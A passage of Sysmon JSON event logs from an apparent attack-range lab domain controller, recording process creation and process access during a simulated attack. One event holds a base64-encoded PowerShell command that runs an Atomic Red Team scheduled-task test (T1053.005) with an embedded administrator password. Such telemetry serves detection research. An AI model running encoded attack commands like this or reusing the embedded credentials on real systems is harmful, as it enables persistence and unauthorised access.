C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.088","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5618,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.417\r\nProcessGuid: {E2A3D6B1-11D6-5F25-0000-0010C24B0800}\r\nProcessId: 2772\r\nImage: C:\\Windows\\System32\\HOSTNAME.EXE\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Hostname APP\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: hostname.exe\r\nCommandLine: \"C:\\Windows\\system32\\HOSTNAME.EXE\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D4-5F25-0000-00205F0B0800}\r\nLogonId: 0x80B5F\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E\r\nParentProcessGuid: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nParentProcessId: 4848\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgAkAG0AeQBBAHIAZwBzACAAPQAgAEAAewAgACIAdQBzAGUAcgBfAG4AYQBtAGUAIgAgAD0AIAAiAEEAVABUAEEAQwBLAFIAQQBOAEcARQBcAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgA7ACAAIgBwAGEAcwBzAHcAbwByAGQAIgAgAD0AIAAiAEkALQBsADEAawBlAC0AQQB0AHQAYQBjAGsALQBSAGEAbgBnAGUAIQAiACAAfQAKAEkAbgB2AG8AawBlAC0AQQB0AG8AbQBpAGMAVABlAHMAdAAgACIAVAAxADAANQAzAC4AMAAwADUAIgAgAC0ASQBuAHAAdQB0AEEAcgBnAHMAIAAkAG0AeQBBAHIAZwBzACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.417","ProcessGuid":"{E2A3D6B1-11D6-5F25-0000-0010C24B0800}","Image":"C:\\Windows\\System32\\HOSTNAME.EXE","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Hostname APP","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"hostname.exe","CommandLine":"\"C:\\Windows\\system32\\HOSTNAME.EXE\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D4-5F25-0000-00205F0B0800}","LogonId":"0x80b5f","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E","ParentProcessGuid":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","ParentProcessId":"4848","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgAkAG0AeQBBAHIAZwBzACAAPQAgAEAAewAgACIAdQBzAGUAcgBfAG4AYQBtAGUAIgAgAD0AIAAiAEEAVABUAEEAQwBLAFIAQQBOAEcARQBcAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgA7ACAAIgBwAGEAcwBzAHcAbwByAGQAIgAgAD0AIAAiAEkALQBsADEAawBlAC0AQQB0AHQAYQBjAGsALQBSAGEAbgBnAGUAIQAiACAAfQAKAEkAbgB2AG8AawBlAC0AQQB0AG8AbQBpAGMAVABlAHMAdAAgACIAVAAxADAANQAzAC4AMAAwADUAIgAgAC0ASQBuAHAAdQB0AEEAcgBnAHMAIAAkAG0AeQBBAHIAZwBzACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5619,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.416\r\nSourceProcessGUID: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nSourceProcessId: 4848\r\nSourceThreadId: 1100\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D6-5F25-0000-0010C24B0800}\r\nTargetProcessId: 2772\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+983c2ee2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+983150a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97824823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97882cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978661e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9785816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978646a0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9786423c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+983150a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97824823(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.416","SourceProcessGUID":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","SourceProcessId":"4848","SourceThreadId":"1100","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D6-5F25-0000-0010C24B0800}","TargetProcessId":"2772","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+983c2ee2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+983150a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97824823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97882cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97866357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978661e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9785816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+978646a0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9786423c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863fbc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97863c8d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+983150a2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97824823(wow64)","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5620,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.416\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D6-5F25-0000-0010C24B0800}\r\nTargetProcessId: 2772\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.416","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D6-5F25-0000-0010C24B0800}","TargetProcessId":"2772","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5621,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.416\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.416","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5622,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.416\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:18.416","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5623,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:18.416\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 